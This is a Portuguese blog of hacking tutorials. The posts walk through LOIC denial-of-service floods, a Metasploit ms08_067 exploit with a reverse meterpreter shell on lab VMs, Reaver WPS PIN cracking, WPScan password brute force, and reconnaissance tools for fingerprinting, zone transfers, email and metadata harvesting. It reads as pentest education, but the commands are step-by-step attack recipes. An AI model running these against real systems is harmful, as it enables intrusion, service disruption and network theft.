Últimos Posts
Mostrando postagens com marcador Tutoriais Hacking. Mostrar todas as postagens
Mostrando postagens com marcador Tutoriais Hacking. Mostrar todas as postagens

quarta-feira, 16 de outubro de 2013

LOIC - A ferramente utilizada pelos anonymous para derrubar sites.

Desde que o grupo Anonymous usou o Low Orbit Ion Cannon (LOIC) para atacar uma serie de empresas que entraram no caminho do Wikileaks, este software tem sido colocado no centro das atenções.


LOIC é uma aplicação open source de ataque de rede, escrito em C. LOIC executa uma negação de serviço, ataque (DoS) (ou quando utilizados por várias pessoas, um ataque DDoS) em um local de destino, inundando o servidor com os pacotes TCP, UDP, HTTP ou pedidos com a intenção de interromper o serviço de um determinado host. As pessoas têm usado para se juntar LOIC alguns botnets.

LOIC pode ser usando para testar reações em servidores contra tal ataque e também para testar os mecanismos de segurança dos envolvidos.

LOIC esta disponível no sistema operacional Windows XP(Clique aqui) ou superior, mas claro que é possível também usar no GNU/Linux com algumas manipulações.

Instalando o LOIC


Provavelmente e possível a instalação em todas as distribuições linux. Nessa tutorial estou usando o Ubuntu.

Começamos instalando os seguinte programas:

No Ubuntu/Debian entre no shell e execute:

sudo apt-get install git-core monodevelop

Encontrei um script que nos permite: Inicia, atualizar e executar o LOIC.

mkdir ~loic 
Baixe o script http://www.4shared.com/get/UCPmSqv4/loic.html
mv loic.sh /home/bhior/~loic
cd ~loic
chmod a+x loic.sh


Instalando o LOIC.

Entre com o seguinte comando:

./loic.sh install

O script ira baixar a ultima versão dispobivel, e em seguinda, executar uma instalação no diretorio ~/loic/LOIC.

Atualizando o LOIC

Entre com o seguinte comando:

./loic.sh update

O script irá verificar a existência de uma nova versão disponível no GIT, e em seguida, executar uma instalação no diretório ~/loic/LOIC.

Iniciando o LOIC

Agora e a parte importante:

./loic.sh run

A seguinte janela deverá aparecer:
Não testem este software em um site que não pertence a você! Na verdade, o software não tem nenhum mecanismo para esconder o seu endereço IP, e você será mais facilmente detectado pelo site de destino. Mesmo sem prever o futuro sei que muitos não vão seguir o apelo. hahaha

Por padrão, o tipo de ataques de inundação são lançados no TCP/80 porta (mas é possível fazer ataques UDP ou HTTP). 10 processos são executados em paralelo.


A interface gráfica é de fácil utilização, creio que é difícil alguém ter dificuldades.

Fonte: Blog Do Bhior
Mais »

domingo, 5 de agosto de 2012

Recursos Publicos para coletar informações do alvo

Na internet, Há vários recursos públicos que podem ser usados para coletar informações sobre o domínio alvo. Os benefícios de usar esses recursos é que nós não geramos trafico de rede para o alvo diretamente, então o alvo não pode saber sobre nossas atividades.

Segue os recursos que podem ser usados: 

URL
http://www.archive.org -  Contem arquivo dos web sites

http://www.domaintools.com/

http://www.alexa.com/ - Banco de dados de informações dos sites

http://serversniff.net/  "canivete suíço" para redes, serverchecks e roteamento

http://centralops.net/ - Utilitário de rede gratuito: domain, e-mail,
browser, ping, traceroute, Whois, e adiante.  


http://www.robtex.com  - Permite você pesquisar sobre informações de domínio e rede

http://www.pipl.com/ Permite você pesquisar pessoas na internet por Nome, Cidade, Estado e Pais

http://yoname.com - Permite você pesquisar pessoas através de redes sociais, sites e blogs.

http://wink.com/ - Buscador gratuito para encontrar pessoas pelo Nome, Telefone, Email, web site, foto e 
adiante.

http://www.isearch.com/ - Buscador gratuito para encontrar pessoas pelo Nome, Telefone ou email

http://www.tineye.com - TinEye é um buscador de imagens. Nós podemos usar TinEye para encontrar de onde a imagem vem, como ela esta sendo usada, se versões modificadas da imagem existe ou para encontrar versões com resoluções maiores.
Mais »

sexta-feira, 3 de agosto de 2012

Usando Dmitry

A ferramenta mágica para coleta de informações ( Dmitry) é uma ferramenta Tudo-em-uma. Ela pode ser usada para coletar as seguintes informações:

* O Registro Whois de um host usando endereço IP ou Domínio.
* Informações do Host do Netcraft.com
* Subdomínios no domínio alvo
* Emails do alvo
* Lista de porta Aberta, Filtrada ou fechada na maquina alvo

Mesmo embora aquelas funcionalidades possam ser obtidas usando outros comandos Linux, é muito conveniente coletar todas essas informações usando uma única ferramenta e salvar o relatório em um arquivo.

# dmitry

Como um exemplo, vamos fazer o seguinte no host alvo.

* Realizar um Whois Lookup usando o nome de Domínio.
* Obter informação do Netcraft.com
* Procurar por todos possíveis subdomínios
* Procurar por todos os possíveis endereços de emails

O comando é

# dmitry -iwnse host_alvo

Uma saida resumida do Dmitry

            ( Coletando informações de Whois )

             ( Coletando informações de subdominio )

Nós também podemos usar o dmitry para fazer um simples port scanning passando o seguinte comando:

# dmitry -p host_alvo -f -b

Segue uma saida do comando:












( Porta 25 aberta )

Até mais.

Mais »

quarta-feira, 23 de maio de 2012

Intrusão Simples com Metasploit


Começando!

Bom galera, vamos começar!

Para que você possa ter uma boa noção de como o Metasploit realmente funciona, nada melhor que conseguir obter o acesso a uma máquina (virtual) e assim poder testar e estudar todas suas funcionalidades, ficando cada dia mais "afiado" em seus testes de intrusão. Sim, este artigo é bem básico.

O cenário utilizado foi o seguinte:

Neste caso são 2 máquinas virtuais (VMs) criadas usando o Virtualbox. As placas de rede de ambas VMs estão configuradas como bridge.
1ª VM = Sistema Operacional Backtrack 4 Final com endereço IP 192.168.0.170.
2ª VM = Sistema Operacional Windows XP SP2 com endereço IP 192.168.0.186.

Scanning com Nmap e Metasploit

Ok pessoal, vamos utilizar a ferramenta "nmap" para fazer o scanning em nossa rede interna.
Abra um terminal no micro com o Backtrack e digite o seguinte comando:

# nmap -v --script=smb-check-vulns 192.168.0.0/24
-v = Modo Verbose
 --script=smb-check-vulns = Script para verificar vulnerabilidades conhecidas, como por exemplo, MS08-067, Conficker, regsvc DoS e SMBv2 exploit.
192.168.0.0/24 = Range de IP utilizado em minha rede local.


Se repararem, no host com endereço IP 192.168.0.186, verá que são mostradas as portas que estão abertas, e em MS08-067 está como VULNERABLE, tendo essa "simples" base, vamos atacá-lo.

Certo, descobrimos um host dentro da nossa LAN que está possivelmente vulnerável ao nosso ataque pretendido!
Agora vamos carregar o Metasploit. No terminal, basta digitar msfconsole e...

Obtemos nosso console do msf. Dei uma personalizada na saída. :-)

Feito isto, vamos efetuar a intrusão na máquina. Os comandos são os seguintes:
use exploit/windows/smb/ms08_067_netapi        #Aqui falamos que queremos usar o exploit ms08_067_netapi

set RHOST 192.168.0.186        #Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM com Windows XP SP2

set PAYLOAD windows/meterpreter/reverse_tcp        #Aqui especificamos o payload que iremos utilizar, reverse_tcp, ele é o responsável por criar a nossa comunicação entre LHOST e RHOST.

set LHOST 192.168.0.170       #Aqui setamos nosso host local, que no caso é o endereço IP da VM com Backtrack 4.

exploit       #E finalmente executamos nosso exploit.

Observem a imagem abaixo.

Pronto!
Ganhamos nossa shell meterpreter, ou seja, já estamos na máquina alvo. Experimente dar os comandos sysinfo e ipconfig.


Ok!
Vamos ver outros recursos que podemos utilizar antes de executarmos o exploit.

Opções Metasploit

Quando executamos o comando exploit, será realizado um "fingerprint" para a detecção do sistema operacional e verificar se o mesmo consta em sua lista de SOs vulneráveis.

Como vimos através do script do nmap que nosso alvo é vulnerável, nós podemos realizar o processo de fingerprint e passar as especificações corretas para o msf, assim nosso exploit não precisará realizar esta etapa, gerando possibilidades menores de erros.

Certo, mas como? Vamos utilizar um módulo auxiliar presente no Metasploit para descobrir a versão do SO, o idioma, nome da máquina e o domínio.

Executaremos os seguintes comandos no console do msf:
use auxiliary/scanner/smb/smb_version #Falamos que queremos utilizar o scanner smb_version.

set RHOSTS 192.168.0.186 #Aqui eu setei um único host (192.168.0.186), mas poderia especificar um range, exemplo, 192.168.0.0/24.

run #Comando para executar nosso scanner.



Agora já sabemos a versão certa do SO e o idioma, com isso especificaremos em nosso exploit usando a opção set TARGET.

use exploit/windows/smb/ms08_067_netapi     #Aqui falamos que queremos usar o exploit ms08_067_netapi

set RHOST 192.168.0.186    #Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM com Windows XP SP2

set PAYLOAD windows/meterpreter/reverse_tcp     #Aqui especificamos o payload que iremos utilizar, reverse_tcp, ele é o responsável por criar a nossa comunicação entre LHOST e RHOST.

set LHOST 192.168.0.170      #Aqui setamos nosso host local, que no caso é o endereço IP da VM com Backtrack 4.

set TARGET 31      #Aqui eu digo que o alvo usa
exploit       #E finalmente executamos nosso exploit.

Na imagem abaixo,com o comando show targets são listados todos os S.O.s vulneráveis a este exploit (ms08_067).

Veja abaixo que iremos utilizar a opção 31.

Veja o ataque agora.

Veja que não foi realizada a etapa de fingerprint com o alvo, pois "falamos" para o exploit o S.O. que ele encontrará em seu destino.

Ok! Finish! The end! Heheheh
Ah!

É isso galera, intrusão simples, sendo recomendado para quem ainda está começando com o Metasploit.




Fonte: Vivaolinux.
Mais »

segunda-feira, 16 de janeiro de 2012

A vulnerabilidade no WPS que torna o WPA/WPA2 vulnerável a ataques !

Introdução

Tradicionalmente, ganhar acesso não autorizado a uma rede com o WPA, especialmente no caso do WPA2 é difícil e demorado, já que é necessário descobrir a chave usando um ataque de força bruta. Chaves curtas podem ser descobertas em alguns dias usando um processador rápido, ou uma boa GPU, mas chaves longas e complexas, especialmente as com 12 dígitos ou mais são quase impossíveis de serem descobertas. Tudo mudou com o descobrimento de uma falha grosseira de segurança no protocolo WPS, que é suportado pela maioria dos roteadores atuais.

O WPS oferece uma forma simples de configuração para redes Wireless. O roteador inclui um PIN de 8 dígitos, geralmente informado em uma etiqueta na parte inferior, permitindo a conexão de qualquer cliente onde este PIN seja informado. Outros vão além oferecendo também um botão de conexão, que deve ser pressionado no roteador para autorizar a conexão de um novo cliente. A ideia do WPS é que este é um padrão de segurança aceitável para uma rede doméstica, já que se alguém tem acesso físico ao roteador, para ver o PIN ou pressionar o botão, ele provavelmente está autorizado a acessar a rede de qualquer forma.


Desde o início, WPS parecia ser uma brecha esperando para ser explorada, mas a facilidade de configuração foi suficiente para reduzir bastante as chamadas de suporte e devoluções de produtos, o que foi suficiente para convencer quase todos os principais fabricantes a incluírem a tecnologia em seus roteadores domésticos. Eventualmente, a bomba explodiu, dando origem à maior brecha de segurança em redes Wi-Fi desde o WEP.

O WPS foi sempre vulnerável a ataques de força bruta, já que um PIN de apenas 8 caracteres, contendo apenas números não oferece uma complexidade muito grande. Em teoria, o protocolo deveria oferecer um sistema se segurança para bloquear clientes depois de algumas tentativas incorretas, mas na prática poucos fabricantes implementaram bloqueios efetivos, deixando a grande maioria dos roteadores do mercado vulneráveis. O único obstáculo é o fato de que para cada tentativa o cliente precisa esperar a resposta do roteador, o que limita o número de tentativas por minuto a cerca de 20 a 40, fazendo com que a quebra de uma chave de 8 dígitos demorasse anos.

Isso mudou com uma brecha tornada pública em 27/12/2011. A forma como o roteador responde às tentativas mal-sucedidas de conexão, enviando um pacote EAP-NACK permite que o atacante descubra se os 4 primeiros dígitos do PIN estão corretos. Para piorar, o último dígito do PIN é um checksum, que pode ser facilmente calculado uma vez que os 7 primeiros dígitos são conhecidos. Com isso, o atacante precisa de um número de tentativas suficiente para descobrir os 4 primeiros dígitos, gerar uma tabela com as possibilidades possíveis para os 3 últimos dígitos e mais o checksum (uma vez que o checksum é a soma dos 7 primeiros dígitos) e realizar uma última rodada de tentativas até encontrar o PIN correto. Com isso, o número de possibilidades cai de 1 bilhão para apenas 11.000 tentativas, que podem ser esgotadas em poucas horas.

Diferente do SSID e da chave WPA, o PIN normalmente não pode ser alterado pelo usuário. Uma vez o atacante obtém acesso à rede, ele continuará conseguindo se conectar, por mais que o dono tente alterar a chave de acesso ou mesmo o SSID da rede. Na maioria dos aparelhos, o PIN pode ser descoberto em apenas 4 a 10 horas, colocando um potencial atacante a apenas uma madrugada de distância da sua rede.

Diferente do WEP, o WPA não permite que uma vez dentro da rede você possa escutar as conexões dos outros clientes, já que cada um utiliza um canal encriptado particular. Entretanto, isso não impede que o atacante possa invadir servidores, roteadores ou as próprias estações para obter assim acesso a dados e outras informações.

A primeira ferramenta para explorar a brecha é o Reaver, publicado pela Tactical Network Solutions. Ele possui uma versão open-source gratuita e também uma versão premium, com direito a suporte e uma interface web de controle. Não apenas ele é capaz de descobrir o PIN de acesso, como também a chave WPA/WPA2 (independentemente da complexidade) e o SSID da rede a partir do endereço MAC do roteador.  No caso de roteadores que permitem definir várias chaves WPA, o ataque permite descobrir todas as chaves de uma só vez.

A versão open-source está disponível no http://code.google.com/p/reaver-wps/. Para instalar a partir do código, você precisa apenas dos compiladores básicos e dos pacotes libpcap-dev (libpcap0.8-dev no Squeeze) e libsqlite3-dev. A instalação é feita usando o tradicional ./configure, make e make install.

Para usá-lo, é necessário colocar a interface em modo monitor, usando o ifconfig e iwconfig, como em:
$ su <senha>
# ifconfig wlan1 down
# iwconfig wlan1 mode monitor
# ifconfig wlan1 up

Apesar de ser uma ferramenta de linha de comando, o reaver é bastante simples de usar, precisando apenas do device da placa wireless e do endereço MAC do roteador alvo (que pode ser facilmente descoberto usando o kismet, airodump-ng ou outra ferramenta de diagnóstico), como em:

# reaver -i wlan1 -b 54:E6:FC:E4:92:82

Caso necessário, você pode especificar também o canal e o SSID da rede no comando, como em:

# reaver -i wlan1 -b 54:E6:FC:E4:92:82 -c 4 -e gdh

A partir daí o resto do ataque é feito automaticamente, com o Reaver tentando todas as possibilidades possíveis para o PIN, aguardando caso o roteador deixar de responder e assim por diante, até encontrar a chave. Em alguns casos, o roteador pode travar durante o teste, ou deixar de responder temporariamente aos clientes da rede local, o que também abre as portas para ataques de negação de serviço.

Já foi até publicado um vídeo oficial que mostra o processo completo, desde a compilação:




A lista dos fabricantes vulneráveis inclui a D-Link, Linksys, Netgear, TP-Link e ZyXEL, bem como a Belkin, Buffalo e Technicolor. Naturalmente, a brecha não atinge todos os produtos, mas a percentavel vulnerável representa dezenas de milhões de aparelhos.

Caso exista uma opção para desativar o WPS na configuração do roteador, ela pode ser uma forma simples de resolver o problema. A principal questão é que em muitos produtos a opção está disponível, mas ela não desativa realmente o WPS, fazendo com que a vulnerabilidade persista. Nesses casos, a solução seria atualizar o firmware ou, (caso não exista um patch disponível) substituir o aparelho por um não vulnerável. Outra solução é substituir o firmware padrão pelo DD-WRT, já que além de oferecer mais opções e recursos, ele não oferece suporte ao WPS, resolvendo o problema pela raiz.

Naturalmente, é possível também bloquear o acesso de clientes não autorizados usando o bloqueio com base no endereços MAC, mas esta é uma proteção que pode ser facilmente burlada, já que basta monitorar a rede por algum tempo, coletar uma lista dos endereços dos clientes que estão transmitindo dados e modificar o enderçeo da placa local para utilizar o mesmo MAC que um deles.

Esta é uma brecha que vai continuar a repercutir por muitos meses ou anos, já que roteadores wireless não são dispositivos que os usuários substituem com muita frequência e, mesmo que a maioria dos fabricantes venha a eventualmente atualizarem todos os modelos vulneráveis, a grande maioria dos usuários nunca chegará a atualizar seus roteadores, continuando a utilizar aparelhos vulneráveis por anos. Como resultado, viajantes e espertinhos em busca de acesso grátis vão voltar a ter facilidade para encontrar redes vulneráveis, assim como na época do WEP.

Fonte: http://www.hardware.com.br/artigos/reaven/
Mais »

domingo, 8 de janeiro de 2012

Descobrindo vulnerabilidades em WordPress - WPScan


WPScan é um  Scanner de segurança para WordPress escrito em Ruby que tenta encontrar falhas de segurança conhecidas no interior das instalações WordPress. Usados pelos profissionais de segurança ou administradores WordPress para avaliar a postura de segurança de suas instalações de WordPress. A base de código é Open Source e licenciado sob a GPLv3 .
As características incluem:
  • Enumeração nome de usuário 
  • Quebra de senha fraca (multithreaded)
  • Enumeração versão 
  • Enumeração de vulnerabilidade (baseado na versão)
  • Enumeração dos plugin 
  • Enumeração vulnerabilidade dos plugins (baseado na versão)
  • Outros cheques diversos

Instalação:

Instalando no Backtrack 5


sudo apt-get install libcurl4-gnutls-dev
sudo gem install --user-install mime-types typhoeus xml-simple


Instalando no Debian/Ubuntu 



sudo apt-get install libcurl4-gnutls-dev libopenssl-ruby
sudo gem install typhoeus xml-simple


Comandos: 


--url ( A url do wordpress para escanear)
--enumerate ( Tipo de enumeração a fazer, podendo ser , u = usuario, v = versão , t = timthumb , p = plugin)
--wordlist ( Fornecer um arquivo contendo as possiveis senhas para o wpscan tentar o brute force)
--username (brute force apenas com um usuario especifico
--generate_plugin_list ( gera uma lista dos plugins )


Exemplos:


Checagem "Não intrusiva"

./wpscan.rb --url www.exemplo.com


Fazer um ataque de força bruta ultilizando o arquivo darkc0de.lst
./wpscan.rb --url www.exemplo.com --wordlist darkc0de.lst --threads 50


Fazer um ataque de força bruta apenas usando o login "admin"
./wpscan.rb --url www.exemplo.com --wordlist darkc0de.lst --username admin


Gerar uma nova lista de plugin 'mais popular', até 150 páginas ...
./wpscan.rb --generate_plugin_list 150


Enumerar plugins instalados
./wpscan.rb --url www.exemplo.com --enumerate p




                                              enumerando os plugins ( --enumerate p )



Download do wpscan - http://code.google.com/p/wpscan/


Mais »

quarta-feira, 4 de janeiro de 2012

Descobrindo o sistema operacional do alvo !






Depois de ter certeza que o alvo esta online, então podemos descobrir o sistema operacional da maquina, Este método é conhecido como fingerprinting OS.

Existe dois métodos de fingerprinting: Ativo e Passivo.

No método ativo, a ferramenta envia pacotes de rede para a máquina-alvo e, em seguida,
que determina o sistema operacional da máquina de destino com base na análise feita
sobre a resposta que recebeu. A vantagem deste método é que o fingerprinting
processo é rápido. No entanto, a desvantagem é que a máquina de destino pode notar a nossa tentativa de obter as informações do sistema operacional.

Para superar a desvantagem método ativo, existe um método passivo para SO
fingerprinting. Este método foi iniciada por Michal Zalewsky quando ele lançou
uma ferramenta chamada p0f. A desvantagem do método passivo é que o processo será
mais lento em comparação com o método ativo.

p0f 

p0f usa uma técnica de Fingerprinting OS baseada na análise da estrutura de um pacote TCP / IP para determinar o sistema operacional e outras propriedades de configuração de um host remoto. O processo é totalmente passivo e não gera qualquer tráfego de rede suspeito. O outro host tem que:

        - Conectar a sua rede - tanto espontaneamente ou de forma induzida, por exemplo quando se tenta estabelecer um fluxo de dados ftp, utilizando IRC...

        - Ou ser contactado por alguma entidade em sua rede usando alguns métodos padrões (tais como navegação na web), que pode aceitar ou recusar a conexão.

        O método pode ver através de firewalls de pacotes e não tem as restrições de um fingerprinting ativo. Os principais usos da detecção passiva de SO são perfis atacante (IDS e honeypots), perfis de visitante (otimização de conteúdo), cliente / usuário profiling (aplicação da política), pen-teste, etc


Vamos usar p0f em um caso muito simples. Basta digitar o seguinte comando no console:
# P0f -i wlan0

Use o (-i) para especificar qual interface de rede o p0f vai usar. exemplo (p0f -i wlan0)  

Em seguida você precisa gerar atividades de rede que envolve a conexão TCP,tais como navegação para a máquina remota ou deixar a máquina remota  se conectar na sua máquina.





Com base no resultado anterior, sabemos que a máquina remota é uma máquina Linux 2.6.
Você pode parar p0f pressionando a combinação Ctrl + C 


Xprobe2

xprobe2 é uma ferramenta de fingerprinting OS do tipo ativa com uma abordagem diferente para fingerprinting.

você pode apenas chamar xprobe2 e dar o endereço IP da máquina ou o nome como o argumento:

# xprobe2 52.1.1.1






Mais »

sexta-feira, 23 de dezembro de 2011

Usando o goog-mail para extrair emails através do google.

O goog-mail é um script escrito em python que extrai emails de um determinado dominio através do google.


Usar : ./goog-mail.py <dominio>


Download do goog-mail



Mais »

Usando o dnswalk para transferir zona de DNS.


dnswalk é um depurador de DNS. Ela realiza transferências de zona dos domínios especificados, e verifica o banco de dados de várias maneiras para consistência interna, bem como a precisão.

A transferência de zona é o termo usado para referir-se o processo pelo qual o conteúdo de um arquivo de zona DNS é copiado de um servidor DNS primário para um servidor DNS secundário.

No caso vamos copiar para o nosso PC.
 



Como usar: 
dnswalk dominio
domínio deve terminar com um '.'

root@laptop:~/$ dnswalk site.com.br. 

                                 print do dnswalk em execução
 

Mais »

Usando o metagoofil para extrair arquivos do site.



Metagoofil é uma ferramenta para extração de metadados de documentos públicos (pdf, doc, xls, ppt, etc) disponiveis nos websites.Estas informações poderia ser útil porque você pode obter nomes de usuários válidos, ou nomes de pessoas, para usar mais tarde em ataques bruteforce senha (vpn, ftp, webapps), a ferramenta também extrai interessante "caminhos" dos documentos, onde podemos obter recursos compartilhados nomes, nomes de servidores, etc

Esta versão extrai o endereço MAC da máquina onde o documento foi criado. (Apenas para os documentos do Microsoft Office)

Toda esta informação não deve estar disponível na net, mas a maioria das empresas não tem políticas sobre o vazamento de informações,e a maioria deles não sabe essa informação existe.

Assim você pode mostrar-lhes o que um atacante pode obter de uma forma simples.


Usando:

#python metagoofil.py -d site.com -l 100 -f doc -o saida.html -t arquivos

-d > Domínio para a pesquisa dos arquivos
-l > Limite dos resultados (No máximo ate 100)
-f >Tipo de arquivo para baixar (all,pdf,doc,xls,ppt,odp,ods, etc)
-o > entrada de arquivo no formato html
-t > diretório para serem armazenados os arquivos baixados



Portanto tenham cuidado com os documentos que você posta na internet, eles podem revelar muitas informações que podem ser utilizadas por atacantes e facilitar a vida deles
- Fornecendo usuários de sua rede,
- Fornecendo informações sobre os hosts que podem ser vítimas de ataque,
- Ajudando a colher dados durante o inicio de um ataque que podem ser utilizados para engenharia social.

Download: Metagoofil 1.4b

 

Mais »
© 2013 Blog Do Max. WP Theme-junkie converted by BloggerTheme9
Traduzido por: Template para Blog